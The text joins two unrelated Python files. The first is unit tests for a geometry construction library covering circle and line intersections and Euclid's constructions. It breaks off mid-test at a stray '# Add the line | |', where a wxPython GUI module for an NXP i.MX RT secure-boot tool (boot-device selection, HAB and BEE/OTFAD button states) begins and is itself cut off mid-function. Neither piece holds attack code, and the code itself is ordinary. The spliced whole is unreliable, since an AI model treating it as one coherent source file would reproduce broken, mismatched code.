def test_intersection_circle_line_tangent2(self):
construction = self.construction1
# Circle with radius=2, so we can avoid using sqrt in this test
circle = construction.add_circle(self.pointA, Point(1, 1))
point_c = Point(0, 2)
point_d = Point(2, 0)
line = construction.add_line(point_c, point_d)
print(construction.find_intersections(circle, line))
self.assertEqual(construction.update_intersections_with_object(line), {Point(1, 1)})
self.assertEqual(construction.update_intersections_with_object(circle), {Point(1, 1)})
def test_intersection_circle_line_secant(self):
construction = self.construction1
# Circle with radius=2, so we can avoid using sqrt in this test
circle = construction.add_circle(self.pointA, self.pointB)
point_c = Point(0, 1)
point_d = Point(1, 0)
line = construction.add_line(point_c, point_d)
self.assertEqual(construction.update_intersections_with_object(line), {Point(1, 0), Point(0, 1)})
self.assertEqual(construction.update_intersections_with_object(circle), {Point(1, 0), Point(0, 1)})
def test_check_if_points_on_same_side(self):
a = Point(0, 0)
b = Point(1, 0)
c = Point(1, 1)
d = Point(2, 2)
e = Point(-1, -2)
line1 = Line(a, b)
self.assertTrue(Construction.check_if_points_on_same_side(line1, c, d))
self.assertFalse(Construction.check_if_points_on_same_side(line1, c, e))
line2 = Line(a, c)
self.assertTrue(Construction.check_if_points_on_same_side(line2, b, e))
self.assertRaises(ValueError, lambda: Construction.check_if_points_on_same_side(line1, a, c))
line3 = Line(b, c) # Vertical Line
self.assertFalse(Construction.check_if_points_on_same_side(line3, d, e))
self.assertTrue(Construction.check_if_points_on_same_side(line3, Point(10, 100), Point(10, 0)))
def test_EuclidI2(self):
construction = BaseConstruction()
a, b = construction.points
c = construction.add_point(Point(1, 1))
new_line = construction.EuclidI2(Line(a, b), c)
self.assertEqual(abs(Line(a, b)), abs(new_line))
def test_EuclidI3(self):
construction = BaseConstruction()
a, b = construction.points
c = construction.add_point(Point(10, 10, name='C'))
short_line = construction.add_line(a, b)
long_line = construction.add_line(a, c)
shortened_line = construction.EuclidI3(short_line=short_line, long_line=long_line)
self.assertEqual(abs(Line(a, b)), abs(shortened_line))
def test_EuclidI10(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
midpoint = construction.EuclidI10(line_ab)
self.assertEqual(Point('1/2', 0), midpoint)
midpoint = construction.Midpoint(line_ab)
self.assertEqual(Point('1/2', 0), midpoint)
def test_PerpendicularBisector(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
bisector = construction.PerpendicularBisector(line_ab)
self.assertEqual(Line(Point('1/2', 0), Point('1/2', 1)), bisector)
def test_ErectPerpendicular(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
bisector = construction.EuclidI11(line_ab, Point('1/2', 0))
self.assertEqual(Line(Point('1/2', 0), Point('1/2', 1)), bisector)
def test_ErectPerpendicularPointNotOnLineFails(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(1, 10, name='C'))
self.assertRaises(ValueError, lambda: construction.ErectPerpendicular(Line(a, b), c))
def test_DropPerpendicular(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
line_ab = construction.add_line(a, b)
bisector = construction.EuclidI12(line_ab, Point('1/2', 1))
self.assertEqual(Line(Point('1/2', 0), Point('1/2', 1)), bisector)
def test_DropPerpendicularPointOnLineFails(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(10, 0, name='C'))
self.assertRaises(ValueError, lambda: construction.DropPerpendicular(Line(a, b), c))
def test_Perpendicular(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(1, 10, name='C'))
perpendicular = construction.Perpendicular(Line(a, b), c)
self.assertEqual(Line(Point(1, 0), Point(1, 10)), perpendicular)
d = construction.add_point(Point(0, 10, name='D'))
perpendicular = construction.Perpendicular(Line(a, b), d)
self.assertEqual(Line(Point(0, 0), Point(0, 10)), perpendicular)
def test_Parallel(self):
construction = BaseConstruction()
a = Point(1, 1)
parallel = construction.ParallelLine(Line(*construction.points), a)
self.assertEqual(0, parallel.slope)
self.assertEqual(1, parallel.intercept)
def test_EuclidI9(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
c = construction.add_point(Point(1, 1, name='C'))
line_ab = construction.add_line(a, b)
line_ac = construction.add_line(a, c)
angle_abc = Angle(line_ab, line_ac, a)
line_bisecting_angle_abc = construction.EuclidI9(angle_abc)
# Test if the line is the angle bisector by testing if the two sub angles are equal
self.assertEqual(Angle(line_bisecting_angle_abc, line_ab, a), Angle(line_bisecting_angle_abc, line_ab, a))
def test_Intersections_WeirdTypes_Fails(self):
construction = BaseConstruction()
a, b = construction.points
line_ab = Line(a, b)
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(a, b)) # Two Points
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(2, 3)) # Two ints
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(a, 2)) # int and point
self.assertRaises(NotImplementedError, lambda: construction.find_intersections(a, line_ab)) # line and point
def test_intersect_circles_that_do_not_intersect(self):
"""Generate two circles that do NOT intersect. Should give an empty set as the intersections"""
construction = Construction()
a = construction.add_point(Point(0, 0))
b = construction.add_point(Point(1, 0))
c = construction.add_point(Point(5, 0))
d = construction.add_point(Point(6, 0))
circle_ab = construction.add_circle(center=a, point2=b)
circle_cd = construction.add_circle(center=c, point2=d)
intersections = construction.find_intersections_circle_circle(circle_ab, circle_cd)
self.assertEqual(set(), intersections)
def test_find_point(self):
construction = BaseConstruction()
# Point is in construction
a = Point(0, 0)
self.assertEqual(a, construction.find_point(a))
# Point is not in construction
c = Point(10, 10)
self.assertEqual(None, construction.find_point(c))
def test_check_lengths(self):
construction = BaseConstruction()
construction.add_point(Point(0, 1))
construction.add_point(Point(1, 1))
# Present lengths are 1 and sqrt(2).
self.assertTrue(construction.check_lengths(1))
self.assertTrue(construction.check_lengths(sympify('sqrt(2)')))
# All other lengths should not be present
self.assertFalse(construction.check_lengths(2))
def test_get_present_lengths(self):
construction = BaseConstruction()
construction.add_point(Point(0, 1))
construction.add_point(Point(1, 1))
# There are only two present lengths, so the length of the dictionary should be 2
self.assertEqual(2, len(construction.get_present_lengths()))
def test_add_random_construction(self):
for i in range(5):
construction = BaseConstruction()
construction.add_random_construction(i)
self.assertEqual(i, len(construction))
def test_update_valid_actions_no_force(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
# At first, we have only 3 valid actions.
self.assertEqual(3, len(construction.actions))
# Now we check if checking the actions at each step gives us the same as checking just at the end (Just in time)
construction2 = copy.deepcopy(construction)
# Add the line AB
construction.add_line(*construction.points)
construction2.add_line(*construction2.points)
self.assertEqual(2, len(construction.actions)) # Only check the first construction
# Circle A rAB
construction.add_circle(center=a, point2=b)
construction2.add_circle(center=a, point2=b)
self.assertEqual(4, len(construction.actions),
msg=f'These are the actions: {construction.actions} of construction\n {construction}')
self.assertEqual(4, len(construction2.actions),
msg=f'These are the actions: {construction.actions} of construction\n {construction}')
self.assertEqual(construction.actions, construction2.actions)
def test_update_valid_actions_with_force(self):
construction = BaseConstruction()
a, b = construction.points
if a.name != 'A':
# Swap the points if we grabbed them backwards
a, b = b, a
# At first, we have only 3 valid actions.
self.assertEqual(3, len(construction.update_valid_actions(force_calculate=True)))
# Now we check if checking the actions at each step gives us the same as checking just at the end (Just in time)
construction2 = copy.deepcopy(construction)
# Add the line | |
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import wx
import sys
# Python 2 only: force the default string encoding to UTF-8 so non-ASCII UI
# text survives implicit str<->unicode conversions.
# NOTE(review): reload(sys)/sys.setdefaultencoding() does not exist on Python 3;
# this module is Python-2 specific.
reload(sys)
sys.setdefaultencoding('utf-8')
import os
import time
import RTyyyy_uidef
import uidef
import uivar
import uilang
# Make the parent directory importable so the sibling packages below resolve.
sys.path.append(os.path.abspath(".."))
from mem import memcore
from run import RTyyyy_rundef
from run import rundef
from fuse import RTyyyy_fusedef
class secBootRTyyyyUi(memcore.secBootMem):
def __init__(self, parent):
memcore.secBootMem.__init__(self, parent)
if self.mcuSeries in uidef.kMcuSeries_iMXRTyyyy:
self.RTyyyy_initUi()
    def RTyyyy_initUi( self ):
        """Initialise all RTyyyy-specific UI state: target setup, then secure-boot sequence."""
        # Boot-device characteristics; refined by RTyyyy_setTargetSetupValue() below.
        self.isXipableDevice = False
        self.isNandDevice = False
        self.isSdmmcCard = False
        # Magic tokens naming the boot device in generated secure-boot scripts.
        self.sbEnableBootDeviceMagic = None
        self.sbAccessBootDeviceMagic = None
        self._RTyyyy_initTargetSetupValue()
        self.RTyyyy_setTargetSetupValue()
        # Secure-boot selections; populated by the secure-boot-seq init calls below.
        self.secureBootType = None
        self.keyStorageRegion = None
        self.isCertEnabledForHwCrypto = None
        self._RTyyyy_initSecureBootSeqValue()
        self._RTyyyy_initSecureBootSeqColor()
        self.RTyyyy_setLanguage()
def _RTyyyy_initTargetSetupValue( self ):
self.m_choice_bootDevice.Clear()
self.m_choice_bootDevice.SetItems(RTyyyy_uidef.kBootDevice_Latest)
totalSel = self.m_choice_bootDevice.GetCount()
if self.toolCommDict['bootDevice'] < totalSel:
self.m_choice_bootDevice.SetSelection(self.toolCommDict['bootDevice'])
else:
self.m_choice_bootDevice.SetSelection(0)
def _setFlexspiNorDeviceForEvkBoard( self ):
try:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_ISSI_IS25LP064A
flexspiNorOpt1 = 0x0
flexspiDeviceModel = self.tgt.flexspiNorDevice
if flexspiDeviceModel == uidef.kFlexspiNorDevice_ISSI_IS25LP064A:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_ISSI_IS25LP064A
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_ISSI_IS26KS512S:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_ISSI_IS26KS512S
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_MXIC_MX25UM51245G:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_MXIC_MX25UM51245G
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_MXIC_MX25UM51345G:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_MXIC_MX25UM51345G
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Micron_MT35X:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Micron_MT35X
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Adesto_AT25SF128A:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Adesto_AT25SF128A
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Adesto_ATXP032:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Adesto_ATXP032
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Cypress_S26KS512S:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Cypress_S26KS512S
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_GigaDevice_GD25LB256E:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_GigaDevice_GD25LB256E
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_GigaDevice_GD25LT256E:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_GigaDevice_GD25LT256E
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_GigaDevice_GD25LX256E:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_GigaDevice_GD25LX256E
elif flexspiDeviceModel == uidef.kFlexspiNorDevice_Winbond_W25Q128JV:
flexspiNorOpt0 = uidef.kFlexspiNorOpt0_Winbond_W25Q128JV
else:
pass
uivar.setBootDeviceConfiguration(uidef.kBootDevice_XspiNor, flexspiNorOpt0, flexspiNorOpt1, flexspiDeviceModel)
except:
pass
def RTyyyy_setTargetSetupValue( self ):
self.showPageInMainBootSeqWin(uidef.kPageIndex_ImageGenerationSequence)
self.bootDevice = self.m_choice_bootDevice.GetString(self.m_choice_bootDevice.GetSelection())
self.RTyyyy_createMcuTarget()
self.refreshBootDeviceList()
self.bootDevice = self.m_choice_bootDevice.GetString(self.m_choice_bootDevice.GetSelection())
self.toolCommDict['bootDevice'] = self.m_choice_bootDevice.GetSelection()
if self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor:
self.isXipableDevice = True
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'flexspinor'
self.sbAccessBootDeviceMagic = ''
self._setFlexspiNorDeviceForEvkBoard()
elif self.bootDevice == RTyyyy_uidef.kBootDevice_SemcNor:
self.isXipableDevice = True
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'semcnor'
self.sbAccessBootDeviceMagic = ''
elif self.bootDevice == RTyyyy_uidef.kBootDevice_LpspiNor:
self.isXipableDevice = False
self.isNandDevice = False
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'spieeprom'
self.sbAccessBootDeviceMagic = 'spieeprom'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNand:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'flexspinand'
self.sbAccessBootDeviceMagic = 'flexspinand'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_SemcNand:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = False
self.sbEnableBootDeviceMagic = 'semcnand'
self.sbAccessBootDeviceMagic = 'semcnand'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_UsdhcSd:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = True
self.sbEnableBootDeviceMagic = 'sdcard'
self.sbAccessBootDeviceMagic = 'sdcard'
elif self.bootDevice == RTyyyy_uidef.kBootDevice_UsdhcMmc:
self.isXipableDevice = False
self.isNandDevice = True
self.isSdmmcCard = True
self.sbEnableBootDeviceMagic = 'mmccard'
self.sbAccessBootDeviceMagic = 'mmccard'
else:
pass
def _RTyyyy_initSecureBootSeqValue( self ):
if not self.initSecureBootTypeList():
self.m_choice_secureBootType.Clear()
self.m_choice_secureBootType.SetItems(RTyyyy_uidef.kSecureBootType_Latest)
totalSel = self.m_choice_secureBootType.GetCount()
if self.toolCommDict['secBootType'] < totalSel:
self.m_choice_secureBootType.SetSelection(self.toolCommDict['secBootType'])
else:
self.m_choice_secureBootType.SetSelection(0)
self.m_textCtrl_serial.Clear()
self.m_textCtrl_serial.write(self.toolCommDict['certSerial'])
self.m_textCtrl_keyPass.Clear()
self.m_textCtrl_keyPass.write(self.toolCommDict['certKeyPass'])
if self.toolCommDict['appFilename'] != None:
self.m_filePicker_appPath.SetPath(self.toolCommDict['appFilename'])
self.m_choice_appFormat.SetSelection(self.toolCommDict['appFormat'])
self._setUserBinaryBaseField()
self.m_textCtrl_appBaseAddr.Clear()
self.m_textCtrl_appBaseAddr.write(self.toolCommDict['appBinBaseAddr'])
self.m_choice_keyStorageRegion.SetSelection(self.toolCommDict['keyStoreRegion'])
self.m_choice_enableCertForHwCrypto.SetSelection(self.toolCommDict['certOptForHwCrypto'])
def _RTyyyy_initSecureBootSeqColor ( self ):
self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
self.keyStorageRegion = self.m_choice_keyStorageRegion.GetString(self.m_choice_keyStorageRegion.GetSelection())
self.RTyyyy_setSecureBootSeqColor()
    def RTyyyy_setSecureBootButtonColor( self, needToPlaySound=True ):
        """Enable/disable and recolour the secure-boot action buttons according to
        the selected secure boot type, boot device and key storage region.

        :param needToPlaySound: queue the 'restart' sound effect after recolouring.
        """
        activeColor = None
        optionalColor = None
        setEnable = None
        # In entry mode the tool drives the flow itself, so everything is greyed out.
        if self.isToolRunAsEntryMode:
            activeColor = uidef.kBootSeqColor_Invalid
            optionalColor = uidef.kBootSeqColor_Invalid
        else:
            activeColor = uidef.kBootSeqColor_Active
            optionalColor = uidef.kBootSeqColor_Optional
        setEnable = not self.isToolRunAsEntryMode
        self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
        if self.secureBootType == RTyyyy_uidef.kSecureBootType_Development:
            # Unsigned development image: only generate + flash apply.
            self.m_button_genImage.Enable( setEnable )
            self.m_button_genImage.SetBackgroundColour( activeColor )
            self.m_button_flashImage.Enable( setEnable )
            self.m_button_flashImage.SetBackgroundColour( activeColor )
        elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabAuth:
            # HAB-signed image: certificate, image, SRK programming and flashing.
            self.m_button_genCert.Enable( setEnable )
            self.m_button_genCert.SetBackgroundColour( activeColor )
            self.m_button_genImage.Enable( setEnable )
            self.m_button_genImage.SetBackgroundColour( activeColor )
            self.m_button_progSrk.Enable( setEnable )
            self.m_button_progSrk.SetBackgroundColour( activeColor )
            self.m_button_flashImage.Enable( setEnable )
            self.m_button_flashImage.SetBackgroundColour( activeColor )
        elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabCrypto:
            # HAB-encrypted image is unavailable for XIP devices unless the target
            # allows non-XIP images on XIP-able devices under closed HAB.
            if (self.bootDevice != RTyyyy_uidef.kBootDevice_FlexspiNor and self.bootDevice != RTyyyy_uidef.kBootDevice_SemcNor) or \
               self.tgt.isNonXipImageAppliableForXipableDeviceUnderClosedHab:
                self.m_button_genCert.Enable( setEnable )
                self.m_button_genCert.SetBackgroundColour( activeColor )
                self.m_button_genImage.Enable( setEnable )
                self.m_button_genImage.SetBackgroundColour( activeColor )
                self.m_button_progSrk.Enable( setEnable )
                self.m_button_progSrk.SetBackgroundColour( activeColor )
                self.m_button_flashImage.Enable( setEnable )
                self.m_button_flashImage.SetBackgroundColour( activeColor )
                self.m_button_progDek.Enable( setEnable )
                self.m_button_progDek.SetBackgroundColour( activeColor )
        elif self.secureBootType in RTyyyy_uidef.kSecureBootType_HwCrypto:
            # Hardware crypto (BEE/OTFAD) applies to FlexSPI NOR only.
            if self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor:
                if self.isCertEnabledForHwCrypto:
                    # Certificate steps are optional for HW crypto.
                    self.m_button_genCert.Enable( setEnable )
                    self.m_button_genCert.SetBackgroundColour( optionalColor )
                    self.m_button_progSrk.Enable( setEnable )
                    self.m_button_progSrk.SetBackgroundColour( optionalColor )
                if self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FixedOtpmkKey:
                    self.m_button_prepHwCrypto.Enable( setEnable )
                    self.m_button_prepHwCrypto.SetBackgroundColour( activeColor )
                elif self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FlexibleUserKeys:
                    self.m_button_prepHwCrypto.Enable( setEnable )
                    self.m_button_prepHwCrypto.SetBackgroundColour( activeColor )
                    self.m_button_operHwCrypto.Enable( setEnable )
                    self.m_button_operHwCrypto.SetBackgroundColour( activeColor )
                    # Record which HW crypto engine the user-keys command should target.
                    userKeyCtrlDict, userKeyCmdDict = uivar.getAdvancedSettings(uidef.kAdvancedSettings_UserKeys)
                    if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
                        userKeyCmdDict['hw_eng'] = 'bee'
                    elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
                        userKeyCmdDict['hw_eng'] = 'otfad'
                    else:
                        pass
                    uivar.setAdvancedSettings(uidef.kAdvancedSettings_UserKeys, userKeyCtrlDict, userKeyCmdDict)
                else:
                    pass
                self.m_button_genImage.Enable( setEnable )
                self.m_button_genImage.SetBackgroundColour( activeColor )
                self.m_button_flashImage.Enable( setEnable )
                self.m_button_flashImage.SetBackgroundColour( activeColor )
        else:
            pass
        # The all-in-one action button is always available.
        self.m_button_allInOneAction.Enable( True )
        self.m_button_allInOneAction.SetBackgroundColour( uidef.kBootSeqColor_Active )
        self.Refresh()
        if needToPlaySound:
            self.soundEffectFilenameForTask = uidef.kSoundEffectFilename_Restart
def _RTyyyy_getImgName( self ):
memType = ''
hasDcd = ''
if self.isNandDevice:
if self.isSdmmcCard:
memType = 'sdmmc_'
else:
memType = 'nand_'
else:
memType = 'nor_'
dcdCtrlDict, dcdSettingsDict = uivar.getBootDeviceConfiguration(RTyyyy_uidef.kBootDevice_Dcd)
if dcdCtrlDict['isDcdEnabled']:
hasDcd = 'dcd_'
return memType, hasDcd
    def RTyyyy_setSecureBootSeqColor( self , needToPlaySound=True ):
        """Recolour and relabel the whole secure-boot-sequence panel for the current
        secure boot type, then delegate the button states to
        RTyyyy_setSecureBootButtonColor().

        :param needToPlaySound: forwarded to the button-colour pass.
        """
        self.hasDynamicLableBeenInit = True
        self.showPageInMainBootSeqWin(uidef.kPageIndex_ImageGenerationSequence)
        self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
        self.refreshSecureBootTypeList()
        self.toolCommDict['secBootType'] = self.m_choice_secureBootType.GetSelection()
        # Re-read after the refresh, which may have rebuilt the choice list.
        self.secureBootType = self.m_choice_secureBootType.GetString(self.m_choice_secureBootType.GetSelection())
        self.resetSecureBootSeqColor()
        # Restore the default (language-dependent) labels before per-type overrides.
        self.m_button_genCert.SetLabel(uilang.kMainLanguageContentDict['button_genCert'][self.languageIndex])
        self.m_button_progSrk.SetLabel(uilang.kMainLanguageContentDict['button_progSrk'][self.languageIndex])
        self.m_button_operHwCrypto.SetLabel(uilang.kMainLanguageContentDict['button_operHwCrypto'][self.languageIndex])
        self.m_button_progDek.SetLabel(uilang.kMainLanguageContentDict['button_progDek'][self.languageIndex])
        if self.secureBootType == RTyyyy_uidef.kSecureBootType_Development:
            # Unsigned image flow: app browse + flash panels, 'unsigned' diagram.
            self.m_panel_genImage1_browseApp.Enable( True )
            self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_u'][self.languageIndex])
            self.m_panel_flashImage1_showImage.Enable( True )
            self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
            strMemType, strHasDcd = self._RTyyyy_getImgName()
            imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "unsigned.png"
            self.showImageLayout(imgPath.encode('utf-8'))
            self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_u'][self.languageIndex])
        elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabAuth:
            # HAB-signed flow: certificate input panels plus the 'signed' diagram.
            self.m_panel_doAuth1_certInput.Enable( True )
            self.m_panel_doAuth1_certInput.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_textCtrl_serial.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
            self.m_textCtrl_keyPass.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
            self.m_panel_doAuth2_certFmt.Enable( True )
            self.m_panel_doAuth2_certFmt.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_panel_genImage1_browseApp.Enable( True )
            self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_s'][self.languageIndex])
            self.m_panel_progSrk1_showSrk.Enable( True )
            self.m_panel_progSrk1_showSrk.SetBackgroundColour( uidef.kBootSeqColor_Active )
            self.m_panel_flashImage1_showImage.Enable( True )
            self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
            strMemType, strHasDcd = self._RTyyyy_getImgName()
            imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "signed.png"
            self.showImageLayout(imgPath.encode('utf-8'))
            self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_s'][self.languageIndex])
        elif self.secureBootType == RTyyyy_uidef.kSecureBootType_HabCrypto:
            # HAB-encrypted flow is unavailable for XIP devices unless the target
            # allows non-XIP images on XIP-able devices under closed HAB.
            if (self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor or self.bootDevice == RTyyyy_uidef.kBootDevice_SemcNor) and \
               (not self.tgt.isNonXipImageAppliableForXipableDeviceUnderClosedHab):
                self.resetSecureBootSeqColor()
            else:
                self.m_panel_doAuth1_certInput.Enable( True )
                self.m_panel_doAuth1_certInput.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.m_textCtrl_serial.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
                self.m_textCtrl_keyPass.SetBackgroundColour( wx.SystemSettings.GetColour( wx.SYS_COLOUR_WINDOW ) )
                self.m_panel_doAuth2_certFmt.Enable( True )
                self.m_panel_doAuth2_certFmt.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.m_panel_genImage1_browseApp.Enable( True )
                self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.m_panel_genImage2_habCryptoAlgo.Enable( True )
                self.m_panel_genImage2_habCryptoAlgo.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_se'][self.languageIndex])
                self.m_panel_progSrk1_showSrk.Enable( True )
                self.m_panel_progSrk1_showSrk.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.m_panel_flashImage1_showImage.Enable( True )
                self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
                strMemType, strHasDcd = self._RTyyyy_getImgName()
                # 'nodek' diagram: the DEK has not been programmed yet at this stage.
                imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "signed_hab_encrypted_nodek.png"
                self.showImageLayout(imgPath.encode('utf-8'))
                self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_e'][self.languageIndex])
                self.m_panel_progDek1_showHabDek.Enable( True )
                self.m_panel_progDek1_showHabDek.SetBackgroundColour( uidef.kBootSeqColor_Active )
        elif self.secureBootType in RTyyyy_uidef.kSecureBootType_HwCrypto:
            # HW crypto (BEE/OTFAD) flow applies to FlexSPI NOR only.
            if self.bootDevice == RTyyyy_uidef.kBootDevice_FlexspiNor:
                self.m_panel_genImage1_browseApp.Enable( True )
                self.m_panel_genImage1_browseApp.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.m_panel_genImage3_enableCertForHwCrypto.Enable( True )
                self.m_panel_genImage3_enableCertForHwCrypto.SetBackgroundColour( uidef.kBootSeqColor_Active )
                self.setKeyStorageRegionColor()
                self.setHwCryptoCertColor()
                self.m_panel_flashImage1_showImage.Enable( True )
                self.m_panel_flashImage1_showImage.SetBackgroundColour( uidef.kBootSeqColor_Active )
            else:
                self.resetSecureBootSeqColor()
        else:
            pass
        self.RTyyyy_setSecureBootButtonColor(needToPlaySound)
        self.Refresh()
def updateImgPictureAfterFlashDek( self ):
strMemType, strHasDcd = self._RTyyyy_getImgName()
imgPath = "../img/RT10yy/" + strMemType + "image_" + strHasDcd + "signed_hab_encrypted.png"
self.showImageLayout(imgPath.encode('utf-8'))
def getSerialAndKeypassContent( self ):
serialContent = self.m_textCtrl_serial.GetLineText(0)
keypassContent = self.m_textCtrl_keyPass.GetLineText(0)
self.toolCommDict['certSerial'] = serialContent
self.toolCommDict['certKeyPass'] = keypassContent
return serialContent, keypassContent
    def setHwCryptoCertColor( self ):
        """Recolour the certificate-related widgets for the HW-crypto (BEE/OTFAD)
        flow according to the 'enable cert' choice, and update the layout picture.
        """
        txt = self.m_choice_enableCertForHwCrypto.GetString(self.m_choice_enableCertForHwCrypto.GetSelection())
        self.toolCommDict['certOptForHwCrypto'] = self.m_choice_enableCertForHwCrypto.GetSelection()
        strMemType, strHasDcd = self._RTyyyy_getImgName()
        imgPath = ""
        strHwCryptoType = ""
        if self.secureBootType == RTyyyy_uidef.kSecureBootType_BeeCrypto:
            strHwCryptoType = 'bee'
        elif self.secureBootType == RTyyyy_uidef.kSecureBootType_OtfadCrypto:
            strHwCryptoType = 'otfad'
        else:
            pass
        if txt == 'No':
            # Encrypted-only image (no certificate/signature).
            self.isCertEnabledForHwCrypto = False
            self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_u'][self.languageIndex])
            imgPath = "../img/RT10yy/nor_image_" + strHasDcd + "unsigned_" + strHwCryptoType + "_encrypted.png"
        elif txt == 'Yes':
            # Signed AND encrypted image.
            self.isCertEnabledForHwCrypto = True
            self.m_button_genImage.SetLabel(uilang.kMainLanguageContentDict['button_genImage_s'][self.languageIndex])
            imgPath = "../img/RT10yy/nor_image_" + strHasDcd + "signed_" + strHwCryptoType + "_encrypted.png"
        else:
            pass
        self.showImageLayout(imgPath.encode('utf-8'))
        self.m_button_flashImage.SetLabel(uilang.kMainLanguageContentDict['button_flashImage_e'][self.languageIndex])
        self.resetCertificateColor()
        if self.isCertEnabledForHwCrypto:
            # Certificate steps are mandatory with the fixed OTPMK key, optional
            # with flexible user keys — reflect that in the highlight colour.
            activeColor = None
            if self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FixedOtpmkKey:
                activeColor = uidef.kBootSeqColor_Active
            elif self.keyStorageRegion == RTyyyy_uidef.kKeyStorageRegion_FlexibleUserKeys:
                activeColor = uidef.kBootSeqColor_Optional
            else:
                pass
            self.m_panel_doAuth1_certInput.Enable( True )
